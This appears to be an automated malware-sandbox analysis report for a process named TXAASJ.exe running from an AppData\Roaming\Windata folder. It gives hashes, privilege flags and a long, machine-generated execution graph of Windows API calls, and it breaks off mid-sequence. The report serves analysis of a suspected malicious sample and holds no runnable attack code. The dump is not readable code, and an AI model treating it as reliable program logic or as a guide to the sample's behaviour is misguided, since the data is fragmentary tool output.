                                                                                                                      Target ID:21
                                                                                                                      Start time:05:41:07
                                                                                                                      Start date:30/12/2024
                                                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4508 -s 8704
                                                                                                                      Imagebase:0x6d0000
                                                                                                                      File size:483'680 bytes
                                                                                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:22
                                                                                                                      Start time:05:42:00
                                                                                                                      Start date:30/12/2024
                                                                                                                      Path:C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe
                                                                                                                      Imagebase:0xe50000
                                                                                                                      File size:1'432'064 bytes
                                                                                                                      MD5 hash:DF6FA61AC1509C2D8B720690829D5634
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      Disassembly

                                                                                                                      Reset < >

                                                                                                                        Execution Graph

                                                                                                                        Execution Coverage:2.3%
                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                        Signature Coverage:6.2%
                                                                                                                        Total number of Nodes:1460
                                                                                                                        Total number of Limit Nodes:139
                                                                                                                        execution_graph 106751 ec1eed 106756 e6e975 106751->106756 106753 ec1f01 106772 e71b2a 52 API calls __cinit 106753->106772 106755 ec1f0b 106773 e7010a 106756->106773 106758 e6ea27 GetModuleFileNameW 106782 e7297d 106758->106782 106760 e6ea5b _wcsncat 106785 e72bff 106760->106785 106763 e7010a 48 API calls 106764 e6ea94 _wcscpy 106763->106764 106788 e5d3d2 106764->106788 106768 e6eae0 Mailbox 106768->106753 106769 e5a4f6 48 API calls 106771 e6eada _wcscat __NMSG_WRITE _wcsncpy 106769->106771 106770 e7010a 48 API calls 106770->106771 106771->106768 106771->106769 106771->106770 106772->106755 106775 e70112 __calloc_impl 106773->106775 106776 e7012c 106775->106776 106777 e7012e std::exception::exception 106775->106777 106807 e745ec 106775->106807 106776->106758 106821 e77495 RaiseException 106777->106821 106779 e70158 106822 e773cb 47 API calls _free 106779->106822 106781 e7016a 106781->106758 106835 e729c7 106782->106835 106861 e7aab9 106785->106861 106789 e7010a 48 API calls 106788->106789 106790 e5d3f3 106789->106790 106791 e7010a 48 API calls 106790->106791 106792 e5d401 106791->106792 106793 e6eb05 106792->106793 106873 e5c4cd 106793->106873 106795 e6eb14 RegOpenKeyExW 106796 e6eb35 106795->106796 106797 ec4b17 RegQueryValueExW 106795->106797 106796->106771 106798 ec4b30 106797->106798 106799 ec4b91 RegCloseKey 106797->106799 106800 e7010a 48 API calls 106798->106800 106801 ec4b49 106800->106801 106877 e54bce 106801->106877 106804 ec4b6f 106880 e57e53 106804->106880 106805 ec4b86 106805->106799 106808 e74667 __calloc_impl 106807->106808 106813 e745f8 __calloc_impl 106807->106813 106830 e7889e 47 API calls __getptd_noexit 106808->106830 106811 e7462b RtlAllocateHeap 106811->106813 106820 e7465f 106811->106820 106813->106811 106814 e74653 106813->106814 106815 e74603 106813->106815 106818 e74651 106813->106818 106828 e7889e 47 API calls __getptd_noexit 106814->106828 106815->106813 106823 e78e52 47 API calls __NMSG_WRITE 106815->106823 106824 e78eb2 47 API calls 5 library calls 106815->106824 106825 e71d65 106815->106825 106829 e7889e 47 API calls __getptd_noexit 106818->106829 106820->106775 106821->106779 106822->106781 106823->106815 106824->106815 106831 e71d33 GetModuleHandleExW 106825->106831 106828->106818 106829->106820 106830->106820 106832 e71d63 ExitProcess 106831->106832 106833 e71d4c GetProcAddress 106831->106833 106833->106832 106834 e71d5e 106833->106834 106834->106832 106836 e729e2 106835->106836 106840 e729d6 106835->106840 106859 e7889e 47 API calls __getptd_noexit 106836->106859 106838 e72b9a 106844 e729c2 106838->106844 106860 e77aa0 8 API calls __wcsnicmp 106838->106860 106840->106836 106846 e72a55 106840->106846 106854 e7a9fb 47 API calls 2 library calls 106840->106854 106842 e72b21 106842->106836 106842->106844 106847 e72b31 106842->106847 106843 e72ae0 106843->106836 106845 e72afc 106843->106845 106856 e7a9fb 47 API calls 2 library calls 106843->106856 106844->106760 106845->106836 106845->106844 106850 e72b12 106845->106850 106846->106836 106853 e72ac2 106846->106853 106855 e7a9fb 47 API calls 2 library calls 106846->106855 106858 e7a9fb 47 API calls 2 library calls 106847->106858 106857 e7a9fb 47 API calls 2 library calls 106850->106857 106853->106842 106853->106843 106854->106846 106855->106853 106856->106845 106857->106844 106858->106844 106859->106838 106860->106844 106862 e7abc6 106861->106862 106863 e7aaca 106861->106863 106871 e7889e 47 API calls __getptd_noexit 106862->106871 106863->106862 106869 e7aad5 106863->106869 106865 e7abbb 106872 e77aa0 8 API calls __wcsnicmp 106865->106872 106867 e6ea8a 106867->106763 106869->106867 106870 e7889e 47 API calls __getptd_noexit 106869->106870 106870->106865 106871->106865 106872->106867 106874 e5c4e7 106873->106874 106875 e5c4da 106873->106875 106876 e7010a 48 API calls 106874->106876 106875->106795 106876->106875 106878 e7010a 48 API calls 106877->106878 106879 e54be0 RegQueryValueExW 106878->106879 106879->106804 106879->106805 106881 e57ecf 106880->106881 106884 e57e5f __NMSG_WRITE 106880->106884 106891 e5a2fb 106881->106891 106883 e57e85 _memmove 106883->106805 106885 e57ec7 106884->106885 106886 e57e7b 106884->106886 106890 e57eda 48 API calls 106885->106890 106889 e5a6f8 48 API calls 106886->106889 106889->106883 106890->106883 106892 e5a321 _memmove 106891->106892 106893 e5a309 106891->106893 106892->106883 106893->106892 106895 e5b8a7 106893->106895 106896 e5b8ba 106895->106896 106898 e5b8b7 _memmove 106895->106898 106897 e7010a 48 API calls 106896->106897 106897->106898 106898->106892 106899 ec1f5f 106902 e545a7 106899->106902 106903 e545e6 mciSendStringW 106902->106903 106904 ec5935 DestroyWindow 106902->106904 106905 e54604 106903->106905 106906 e547a6 106903->106906 106907 ec5941 106904->106907 106905->106907 106908 e54610 106905->106908 106906->106905 106909 e547b5 UnregisterHotKey 106906->106909 106910 ec595a FindClose 106907->106910 106911 ec5946 106907->106911 106913 ec5976 106908->106913 106914 e5462b 106908->106914 106909->106906 106910->106913 106932 e550ec CloseHandle 106911->106932 106916 ec599b FreeLibrary 106913->106916 106918 ec59ac 106913->106918 106914->106918 106920 e54639 106914->106920 106915 ec5950 106915->106913 106916->106913 106917 ec59c0 VirtualFree 106917->106918 106918->106917 106922 e546a6 106918->106922 106919 e54695 CoUninitialize 106919->106922 106920->106919 106930 e532c9 CloseHandle 106922->106930 106923 e546ae Mailbox 106931 e54208 47 API calls Mailbox 106923->106931 106925 e546c9 Mailbox 106926 e52de4 47 API calls 106925->106926 106927 e546df Mailbox 106926->106927 106928 e53282 CloseHandle InternetCloseHandle InternetCloseHandle WaitForSingleObject 106927->106928 106929 e547a1 106928->106929 106930->106923 106932->106915 106933 ec1eca 106938 e6be17 106933->106938 106937 ec1ed9 106939 e5d3d2 48 API calls 106938->106939 106940 e6be85 106939->106940 106946 e6c929 106940->106946 106942 e6bf22 106943 e6bf3e 106942->106943 106949 e6c8b7 48 API calls _memmove 106942->106949 106945 e71b2a 52 API calls __cinit 106943->106945 106945->106937 106950 e6c955 106946->106950 106949->106942 106951 e6c948 106950->106951 106952 e6c962 106950->106952 106951->106942 106952->106951 106953 e6c969 RegOpenKeyExW 106952->106953 106953->106951 106954 e6c983 RegQueryValueExW 106953->106954 106955 e6c9a4 106954->106955 106956 e6c9b9 RegCloseKey 106954->106956 106955->106956 106956->106951 106957 ec1edb 106962 e5131c 106957->106962 106959 ec1ee1 106995 e71b2a 52 API calls __cinit 106959->106995 106961 ec1eeb 106963 e5133e 106962->106963 106996 e51624 106963->106996 106968 e5d3d2 48 API calls 106969 e5137e 106968->106969 106970 e5d3d2 48 API calls 106969->106970 106971 e51388 106970->106971 106972 e5d3d2 48 API calls 106971->106972 106973 e51392 106972->106973 106974 e5d3d2 48 API calls 106973->106974 106975 e513d8 106974->106975 106976 e5d3d2 48 API calls 106975->106976 106977 e514bb 106976->106977 107004 e51673 106977->107004 106981 e514eb 106982 e5d3d2 48 API calls 106981->106982 106983 e514f5 106982->106983 107033 e5175e 106983->107033 106985 e51540 106986 e51550 GetStdHandle 106985->106986 106987 ec58da 106986->106987 106988 e515ab 106986->106988 106987->106988 106989 ec58e3 106987->106989 106990 e515b1 CoInitialize 106988->106990 107040 e99bd1 53 API calls 106989->107040 106990->106959 106992 ec58ea 107041 e9a2f6 CreateThread 106992->107041 106994 ec58f6 CloseHandle 106994->106990 106995->106961 107042 e517e0 106996->107042 106999 e57e53 48 API calls 107000 e51344 106999->107000 107001 e516db 107000->107001 107056 e51867 6 API calls 107001->107056 107003 e51374 107003->106968 107005 e5d3d2 48 API calls 107004->107005 107006 e51683 107005->107006 107007 e5d3d2 48 API calls 107006->107007 107008 e5168b 107007->107008 107057 e57d70 107008->107057 107011 e57d70 48 API calls 107012 e5169b 107011->107012 107013 e5d3d2 48 API calls 107012->107013 107014 e516a6 107013->107014 107015 e7010a 48 API calls 107014->107015 107016 e514c5 107015->107016 107017 e516f2 107016->107017 107018 e51700 107017->107018 107019 e5d3d2 48 API calls 107018->107019 107020 e5170b 107019->107020 107021 e5d3d2 48 API calls 107020->107021 107022 e51716 107021->107022 107023 e5d3d2 48 API calls 107022->107023 107024 e51721 107023->107024 107025 e5d3d2 48 API calls 107024->107025 107026 e5172c 107025->107026 107027 e57d70 48 API calls 107026->107027 107028 e51737 107027->107028 107029 e7010a 48 API calls 107028->107029 107030 e5173e 107029->107030 107031 e51747 RegisterWindowMessageW 107030->107031 107032 ec24a6 107030->107032 107031->106981 107034 ec67dd 107033->107034 107035 e5176e 107033->107035 107062 e9d231 50 API calls 107034->107062 107036 e7010a 48 API calls 107035->107036 107038 e51776 107036->107038 107038->106985 107039 ec67e8 107040->106992 107041->106994 107063 e9a2dc 54 API calls 107041->107063 107049 e517fc 107042->107049 107045 e517fc 48 API calls 107046 e517f0 107045->107046 107047 e5d3d2 48 API calls 107046->107047 107048 e5165b 107047->107048 107048->106999 107050 e5d3d2 48 API calls 107049->107050 107051 e51807 107050->107051 107052 e5d3d2 48 API calls 107051->107052 107053 e5180f 107052->107053 107054 e5d3d2 48 API calls 107053->107054 107055 e517e8 107054->107055 107055->107045 107056->107003 107058 e5d3d2 48 API calls 107057->107058 107059 e57d79 107058->107059 107060 e5d3d2 48 API calls 107059->107060 107061 e51693 107060->107061 107061->107011 107062->107039 107064 e76a80 107065 e76a8c __getstream 107064->107065 107101 e78b7b GetStartupInfoW 107065->107101 107068 e76a91 107103 e7a937 GetProcessHeap 107068->107103 107069 e76ae9 107070 e76af4 107069->107070 107191 e76bd0 47 API calls 3 library calls 107069->107191 107104 e787d7 107070->107104 107073 e76afa 107074 e76b05 __RTC_Initialize 107073->107074 107192 e76bd0 47 API calls 3 library calls 107073->107192 107125 e7ba66 107074->107125 107077 e76b14 107078 e76b20 GetCommandLineW 107077->107078 107193 e76bd0 47 API calls 3 library calls 107077->107193 107144 e83c2d GetEnvironmentStringsW 107078->107144 107081 e76b1f 107081->107078 107085 e76b45 107157 e83a64 107085->107157 107088 e76b4b 107089 e76b56 107088->107089 107195 e71d7b 47 API calls 3 library calls 107088->107195 107171 e71db5 107089->107171 107092 e76b5e 107093 e76b69 __wwincmdln 107092->107093 107196 e71d7b 47 API calls 3 library calls 107092->107196 107175 e53682 107093->107175 107096 e76b7d 107097 e76b8c 107096->107097 107188 e72011 107096->107188 107197 e71da6 47 API calls _doexit 107097->107197 107100 e76b91 __getstream 107102 e78b91 107101->107102 107102->107068 107103->107069 107198 e71e5a 30 API calls 2 library calls 107104->107198 107106 e787dc 107199 e78ab3 InitializeCriticalSectionAndSpinCount 107106->107199 107108 e787e1 107109 e787e5 107108->107109 107201 e78afd TlsAlloc 107108->107201 107200 e7884d 50 API calls 2 library calls 107109->107200 107112 e787ea 107112->107073 107113 e787f7 107113->107109 107114 e78802 107113->107114 107202 e77616 107114->107202 107117 e78844 107210 e7884d 50 API calls 2 library calls 107117->107210 107120 e78849 107120->107073 107121 e78823 107121->107117 107122 e78829 107121->107122 107209 e78724 47 API calls 4 library calls 107122->107209 107124 e78831 GetCurrentThreadId 107124->107073 107126 e7ba72 __getstream 107125->107126 107219 e78984 107126->107219 107128 e7ba79 107129 e77616 __calloc_crt 47 API calls 107128->107129 107131 e7ba8a 107129->107131 107130 e7baf5 GetStartupInfoW 107139 e7bc33 107130->107139 107141 e7bb0a 107130->107141 107131->107130 107132 e7ba95 @_EH4_CallFilterFunc@8 __getstream 107131->107132 107132->107077 107133 e7bcf7 107226 e7bd0b LeaveCriticalSection _doexit 107133->107226 107135 e7bc7c GetStdHandle 107135->107139 107136 e77616 __calloc_crt 47 API calls 107136->107141 107137 e7bc8e GetFileType 107137->107139 107138 e7bb58 107138->107139 107142 e7bb8a GetFileType 107138->107142 107143 e7bb98 InitializeCriticalSectionAndSpinCount 107138->107143 107139->107133 107139->107135 107139->107137 107140 e7bcbb InitializeCriticalSectionAndSpinCount 107139->107140 107140->107139 107141->107136 107141->107138 107141->107139 107142->107138 107142->107143 107143->107138 107145 e76b30 107144->107145 107147 e83c3e 107144->107147 107151 e8382b GetModuleFileNameW 107145->107151 107264 e77660 47 API calls __crtCompareStringA_stat 107147->107264 107149 e83c64 _memmove 107150 e83c7a FreeEnvironmentStringsW 107149->107150 107150->107145 107152 e8385f _wparse_cmdline 107151->107152 107153 e76b3a 107152->107153 107154 e83899 107152->107154 107153->107085 107194 e71d7b 47 API calls 3 library calls 107153->107194 107265 e77660 47 API calls __crtCompareStringA_stat 107154->107265 107156 e8389f _wparse_cmdline 107156->107153 107158 e83a7d __NMSG_WRITE 107157->107158 107162 e83a75 107157->107162 107159 e77616 __calloc_crt 47 API calls 107158->107159 107167 e83aa6 __NMSG_WRITE 107159->107167 107160 e83afd 107161 e728ca _free 47 API calls 107160->107161 107161->107162 107162->107088 107163 e77616 __calloc_crt 47 API calls 107163->107167 107164 e83b22 107165 e728ca _free 47 API calls 107164->107165 107165->107162 107167->107160 107167->107162 107167->107163 107167->107164 107168 e83b39 107167->107168 107266 e83317 47 API calls 2 library calls 107167->107266 107267 e77ab0 IsProcessorFeaturePresent 107168->107267 107170 e83b45 107170->107088 107172 e71dc1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 107171->107172 107174 e71e00 __IsNonwritableInCurrentImage 107172->107174 107290 e71b2a 52 API calls __cinit 107172->107290 107174->107092 107176 ec23b5 107175->107176 107177 e5369c 107175->107177 107178 e536d6 IsThemeActive 107177->107178 107291 e72025 107178->107291 107182 e53702 107303 e532de SystemParametersInfoW SystemParametersInfoW 107182->107303 107184 e5370e 107304 e5374e GetCurrentDirectoryW 107184->107304 107187 e5373b 107187->107096 108489 e71ee2 107188->108489 107190 e72020 107190->107097 107191->107070 107192->107074 107193->107081 107197->107100 107198->107106 107199->107108 107200->107112 107201->107113 107203 e7761d 107202->107203 107205 e7765a 107203->107205 107206 e7763b Sleep 107203->107206 107211 e83e5a 107203->107211 107205->107117 107208 e78b59 TlsSetValue 107205->107208 107207 e77652 107206->107207 107207->107203 107207->107205 107208->107121 107209->107124 107210->107120 107212 e83e65 107211->107212 107216 e83e80 __calloc_impl 107211->107216 107213 e83e71 107212->107213 107212->107216 107218 e7889e 47 API calls __getptd_noexit 107213->107218 107215 e83e90 RtlAllocateHeap 107215->107216 107217 e83e76 107215->107217 107216->107215 107216->107217 107217->107203 107218->107217 107220 e78995 107219->107220 107221 e789a8 EnterCriticalSection 107219->107221 107227 e78a0c 107220->107227 107221->107128 107223 e7899b 107223->107221 107251 e71d7b 47 API calls 3 library calls 107223->107251 107226->107132 107228 e78a18 __getstream 107227->107228 107229 e78a21 107228->107229 107230 e78a39 107228->107230 107252 e78e52 47 API calls __NMSG_WRITE 107229->107252 107232 e78a37 107230->107232 107238 e78aa1 __getstream 107230->107238 107232->107230 107254 e77660 47 API calls __crtCompareStringA_stat 107232->107254 107233 e78a26 107253 e78eb2 47 API calls 5 library calls 107233->107253 107236 e78a4d 107239 e78a54 107236->107239 107240 e78a63 107236->107240 107237 e78a2d 107243 e71d65 _fast_error_exit 3 API calls 107237->107243 107238->107223 107255 e7889e 47 API calls __getptd_noexit 107239->107255 107242 e78984 __lock 46 API calls 107240->107242 107245 e78a6a 107242->107245 107243->107232 107244 e78a59 107244->107238 107246 e78a8e 107245->107246 107247 e78a79 InitializeCriticalSectionAndSpinCount 107245->107247 107256 e728ca 107246->107256 107248 e78a94 107247->107248 107262 e78aaa LeaveCriticalSection _doexit 107248->107262 107252->107233 107253->107237 107254->107236 107255->107244 107257 e728d3 RtlFreeHeap 107256->107257 107258 e728fc _free 107256->107258 107257->107258 107259 e728e8 107257->107259 107258->107248 107263 e7889e 47 API calls __getptd_noexit 107259->107263 107261 e728ee GetLastError 107261->107258 107262->107238 107263->107261 107264->107149 107265->107156 107266->107167 107268 e77abb 107267->107268 107273 e77945 107268->107273 107272 e77ad6 107272->107170 107274 e7795f _memset ___raise_securityfailure 107273->107274 107275 e7797f IsDebuggerPresent 107274->107275 107281 e78e3c SetUnhandledExceptionFilter UnhandledExceptionFilter 107275->107281 107278 e77a66 107280 e78e27 GetCurrentProcess TerminateProcess 107278->107280 107279 e77a43 ___raise_securityfailure 107282 e7b4bf 107279->107282 107280->107272 107281->107279 107283 e7b4c7 107282->107283 107284 e7b4c9 IsProcessorFeaturePresent 107282->107284 107283->107278 107286 e84560 107284->107286 107289 e8450f 5 API calls ___raise_securityfailure 107286->107289 107288 e84643 107288->107278 107289->107288 107290->107174 107292 e78984 __lock 47 API calls 107291->107292 107293 e72030 107292->107293 107349 e78ae8 LeaveCriticalSection 107293->107349 107295 e536fb 107296 e7208d 107295->107296 107297 e720b1 107296->107297 107298 e72097 107296->107298 107297->107182 107298->107297 107350 e7889e 47 API calls __getptd_noexit 107298->107350 107300 e720a1 107351 e77aa0 8 API calls __wcsnicmp 107300->107351 107302 e720ac 107302->107182 107303->107184 107352 e54257 107304->107352 107306 e5377f IsDebuggerPresent 107307 e5378d 107306->107307 107308 ec21b7 MessageBoxA 107306->107308 107309 e53852 107307->107309 107310 ec21d0 107307->107310 107311 e537aa 107307->107311 107308->107310 107312 e53859 SetCurrentDirectoryW 107309->107312 107512 e92f5b 48 API calls 107310->107512 107416 e53bff 107311->107416 107315 e53716 SystemParametersInfoW 107312->107315 107315->107187 107316 ec21e0 107321 ec21f6 SetCurrentDirectoryW 107316->107321 107318 e537c8 GetFullPathNameW 107428 e534f3 107318->107428 107321->107315 107322 e5380f 107323 e53818 107322->107323 107513 e8be31 AllocateAndInitializeSid CheckTokenMembership FreeSid 107322->107513 107443 e530a5 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 107323->107443 107326 ec2213 107326->107323 107329 ec2224 GetModuleFileNameW 107326->107329 107514 e5caee 107329->107514 107330 e53837 107451 e5e1f0 107330->107451 107331 e53822 107331->107330 107510 e53598 67 API calls _memset 107331->107510 107337 ec224c 107518 e539e8 48 API calls 2 library calls 107337->107518 107338 ec2271 107521 e539e8 48 API calls 2 library calls 107338->107521 107341 ec2257 107519 e539e8 48 API calls 2 library calls 107341->107519 107343 ec226d GetForegroundWindow ShellExecuteW 107347 ec22a5 Mailbox 107343->107347 107346 ec2264 107520 e539e8 48 API calls 2 library calls 107346->107520 107347->107309 107349->107295 107350->107300 107351->107302 107522 e53c70 107352->107522 107356 e54278 GetModuleFileNameW 107539 e534c1 107356->107539 107361 e5caee 48 API calls 107362 e542ba 107361->107362 107554 e5d380 107362->107554 107364 e542ca Mailbox 107365 e5caee 48 API calls 107364->107365 107366 e542f2 107365->107366 107367 e5d380 55 API calls 107366->107367 107368 e54305 Mailbox 107367->107368 107369 e5caee 48 API calls 107368->107369 107370 e54316 107369->107370 107558 e5d2d2 107370->107558 107372 e54328 Mailbox 107373 e5d3d2 48 API calls 107372->107373 107374 e5433b 107373->107374 107564 e54477 107374->107564 107378 e54355 107379 e5435f 107378->107379 107380 ec20f7 107378->107380 107382 e71bc7 _W_store_winword 59 API calls 107379->107382 107381 e54477 48 API calls 107380->107381 107383 ec210b 107381->107383 107384 e5436a 107382->107384 107386 e54477 48 API calls 107383->107386 107384->107383 107385 e54374 107384->107385 107387 e71bc7 _W_store_winword 59 API calls 107385->107387 107388 ec2127 107386->107388 107389 e5437f 107387->107389 107390 ec212f GetModuleFileNameW 107388->107390 107389->107390 107391 e54389 107389->107391 107393 e54477 48 API calls 107390->107393 107392 e71bc7 _W_store_winword 59 API calls 107391->107392 107394 e54394 107392->107394 107395 ec2160 107393->107395 107396 e543d6 107394->107396 107401 e54477 48 API calls 107394->107401 107404 ec2185 _wcscpy 107394->107404 107608 e5c935 107395->107608 107398 e543e7 107396->107398 107396->107404 107580 e53320 107398->107580 107400 e54477 48 API calls 107402 ec217d 107400->107402 107403 e543b8 _wcscpy 107401->107403 107402->107404 107410 e54477 48 API calls 107403->107410 107406 e54477 48 API calls 107404->107406 107409 ec21ab 107406->107409 107407 e543ff 107591 e614a0 107407->107591 107409->107409 107410->107396 107411 e614a0 48 API calls 107413 e5440f 107411->107413 107413->107411 107414 e54477 48 API calls 107413->107414 107415 e54451 Mailbox 107413->107415 107607 e57bef 48 API calls 107413->107607 107414->107413 107415->107306 107417 ec3ce4 _memset 107416->107417 107418 e53c1f 107416->107418 107420 ec3cf6 GetOpenFileNameW 107417->107420 108079 e531b8 107418->108079 107420->107418 107422 e537c0 107420->107422 107421 e53c28 108086 e53a67 SHGetMalloc 107421->108086 107422->107309 107422->107318 107424 e53c31 108091 e53b45 GetFullPathNameW 107424->108091 108174 e5a716 107428->108174 107430 e53501 107431 e53575 107430->107431 108185 e521dd 86 API calls 107430->108185 107431->107316 107431->107322 107433 e5350a 107433->107431 108186 e55460 88 API calls Mailbox 107433->108186 107435 e53513 107435->107431 107436 e53517 GetFullPathNameW 107435->107436 107437 e57e53 48 API calls 107436->107437 107438 e53541 107437->107438 107439 e57e53 48 API calls 107438->107439 107440 e5354e 107439->107440 107441 ec66b4 _wcscat 107440->107441 107442 e57e53 48 API calls 107440->107442 107442->107431 107444 e5310f 107443->107444 107445 ec21b0 107443->107445 108189 e5318a 107444->108189 107449 e53185 107450 e52e9d CreateWindowExW CreateWindowExW ShowWindow ShowWindow 107449->107450 107450->107331 107452 e5e216 107451->107452 107509 e5e226 Mailbox 107451->107509 107453 e5e670 107452->107453 107452->107509 108225 e6ecee 255 API calls 107453->108225 107455 e53842 107455->107309 107511 e52b94 Shell_NotifyIconW _memset 107455->107511 107458 e5e26c PeekMessageW 107458->107509 107460 e5e695 LockWindowUpdate DestroyWindow GetMessageW 107460->107455 107463 e5e6c7 107460->107463 107461 ec5b13 Sleep 107461->107509 107465 ec62a7 TranslateMessage DispatchMessageW GetMessageW 107463->107465 107464 e5e4e7 107464->107455 108201 e5322e 107464->108201 107465->107455 107465->107465 107467 e6cf79 49 API calls 107467->107509 107468 e5e657 PeekMessageW 107468->107509 107469 e5e517 timeGetTime 107469->107509 107471 e7010a 48 API calls 107471->107509 107472 e5c935 48 API calls 107472->107509 107473 e5e641 TranslateMessage DispatchMessageW 107473->107468 107474 ec5dfc WaitForSingleObject 107476 ec5e19 GetExitCodeProcess CloseHandle 107474->107476 107474->107509 107475 ec6147 Sleep 107501 ec5cce Mailbox 107475->107501 107476->107509 107477 e5d3d2 48 API calls 107477->107501 107478 e5e6cc timeGetTime 108226 e6cf79 49 API calls 107478->108226 107479 ec5feb Sleep 107479->107501 107483 ec61de GetExitCodeProcess 107487 ec620a CloseHandle 107483->107487 107488 ec61f4 WaitForSingleObject 107483->107488 107485 e51000 231 API calls 107485->107509 107486 e6e3a5 timeGetTime 107486->107501 107487->107501 107488->107487 107488->107509 107489 ec5cea Sleep 107489->107509 107490 ec5cd7 Sleep 107490->107489 107491 eb8a48 108 API calls 107491->107501 107492 e51dce 107 API calls 107492->107501 107494 ec6266 Sleep 107494->107509 107495 e5caee 48 API calls 107495->107501 107499 e5d380 55 API calls 107499->107501 107501->107477 107501->107483 107501->107486 107501->107489 107501->107490 107501->107491 107501->107492 107501->107494 107501->107495 107501->107499 107501->107509 108228 e956dc 49 API calls Mailbox 107501->108228 108229 e6cf79 49 API calls 107501->108229 108230 e51000 255 API calls 107501->108230 108270 ead12a 50 API calls 107501->108270 108271 e98355 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 107501->108271 108272 e96f5b 63 API calls 3 library calls 107501->108272 107506 e5d380 55 API calls 107506->107509 107507 e9d520 86 API calls 107507->107509 107508 e5caee 48 API calls 107508->107509 107509->107458 107509->107461 107509->107464 107509->107467 107509->107468 107509->107469 107509->107471 107509->107472 107509->107473 107509->107474 107509->107475 107509->107478 107509->107479 107509->107485 107509->107489 107509->107501 107509->107506 107509->107507 107509->107508 108194 e5e7e0 107509->108194 108219 e5e7b0 255 API calls Mailbox 107509->108219 108220 e5ea00 255 API calls 2 library calls 107509->108220 108221 e644e0 255 API calls Mailbox 107509->108221 108222 e63680 255 API calls 2 library calls 107509->108222 108223 e6f381 TranslateAcceleratorW 107509->108223 108224 e6ed1a IsDialogMessageW GetClassLongW 107509->108224 108227 eb8b20 48 API calls 107509->108227 108231 e5fa40 107509->108231 107510->107330 107511->107309 107512->107316 107513->107326 107515 e5cafd __NMSG_WRITE _memmove 107514->107515 107516 e7010a 48 API calls 107515->107516 107517 e5cb3b 107516->107517 107517->107337 107517->107338 107518->107341 107519->107346 107520->107343 107521->107343 107523 e5d3d2 48 API calls 107522->107523 107524 e53c80 107523->107524 107525 e5a359 107524->107525 107526 e5a366 __ftell_nolock 107525->107526 107527 e57e53 48 API calls 107526->107527 107533 e5a4cc Mailbox 107526->107533 107529 e5a398 107527->107529 107538 e5a3ce Mailbox 107529->107538 107612 e5a4f6 107529->107612 107530 e5a4f6 48 API calls 107530->107538 107531 e5a49f 107532 e5caee 48 API calls 107531->107532 107531->107533 107535 e5a4c0 107532->107535 107533->107356 107534 e5caee 48 API calls 107534->107538 107616 e55b47 48 API calls _memmove 107535->107616 107538->107530 107538->107531 107538->107533 107538->107534 107615 e55b47 48 API calls _memmove 107538->107615 107617 e53f9b 107539->107617 107542 e534ea 107551 e58182 107542->107551 107546 e728ca _free 47 API calls 107548 ec34d0 107546->107548 107547 ec34c3 107547->107546 107549 e53e39 84 API calls 107548->107549 107550 ec34d9 107549->107550 107550->107550 107552 e7010a 48 API calls 107551->107552 107553 e542ad 107552->107553 107553->107361 107555 e5d38b 107554->107555 107556 e5d3b4 107555->107556 108068 e5d772 55 API calls 107555->108068 107556->107364 107559 e5d30a 107558->107559 107560 e5d2df 107558->107560 107559->107372 107563 e5d2e6 107560->107563 108070 e5d349 53 API calls 107560->108070 107563->107559 108069 e5d349 53 API calls 107563->108069 107565 e54481 107564->107565 107566 e5449a 107564->107566 107567 e5c935 48 API calls 107565->107567 107568 e57e53 48 API calls 107566->107568 107569 e54347 107567->107569 107568->107569 107570 e71bc7 107569->107570 107571 e71bd3 107570->107571 107572 e71c48 107570->107572 107579 e71bf8 107571->107579 108071 e7889e 47 API calls __getptd_noexit 107571->108071 108073 e71c5a 59 API calls 4 library calls 107572->108073 107575 e71c55 107575->107378 107576 e71bdf 108072 e77aa0 8 API calls __wcsnicmp 107576->108072 107578 e71bea 107578->107378 107579->107378 107581 e53334 107580->107581 107583 e53339 Mailbox 107580->107583 108074 e5342c 48 API calls 107581->108074 107588 e53347 107583->107588 108075 e5346e 48 API calls 107583->108075 107585 e7010a 48 API calls 107587 e533d8 107585->107587 107586 e53422 107586->107407 107589 e7010a 48 API calls 107587->107589 107588->107585 107588->107586 107590 e533e3 107589->107590 107590->107407 107590->107590 107592 e61606 107591->107592 107593 e614b2 107591->107593 107592->107413 107595 e7010a 48 API calls 107593->107595 107606 e614be 107593->107606 107596 ec5299 107595->107596 107598 e7010a 48 API calls 107596->107598 107597 e6156d 107597->107413 107605 ec52a4 107598->107605 107599 e614c9 107599->107597 107600 e7010a 48 API calls 107599->107600 107601 e615af 107600->107601 107602 e615c2 107601->107602 108076 e6d6b4 48 API calls 107601->108076 107602->107413 107604 e7010a 48 API calls 107604->107605 107605->107604 107605->107606 107606->107599 108077 e5346e 48 API calls 107606->108077 107607->107413 107609 e5c940 107608->107609 107610 e5c948 107608->107610 108078 e5d805 48 API calls _memmove 107609->108078 107610->107400 107613 e5b8a7 48 API calls 107612->107613 107614 e5a501 107613->107614 107614->107529 107615->107538 107616->107533 107682 e53f5d 107617->107682 107622 e53fc6 LoadLibraryExW 107692 e53e78 107622->107692 107623 ec5830 107625 e53e39 84 API calls 107623->107625 107627 ec5837 107625->107627 107629 e53e78 3 API calls 107627->107629 107631 ec583f 107629->107631 107630 e53fed 107630->107631 107632 e53ff9 107630->107632 107718 e5417d 107631->107718 107634 e53e39 84 API calls 107632->107634 107636 e534e2 107634->107636 107636->107542 107641 e9cc82 107636->107641 107638 ec5866 107726 e541cb 107638->107726 107640 ec5873 107642 e541a7 83 API calls 107641->107642 107643 e9ccf1 107642->107643 107904 e9ce59 107643->107904 107646 e5417d 64 API calls 107647 e9cd1e 107646->107647 107648 e5417d 64 API calls 107647->107648 107649 e9cd2e 107648->107649 107650 e5417d 64 API calls 107649->107650 107651 e9cd49 107650->107651 107652 e5417d 64 API calls 107651->107652 107653 e9cd64 107652->107653 107654 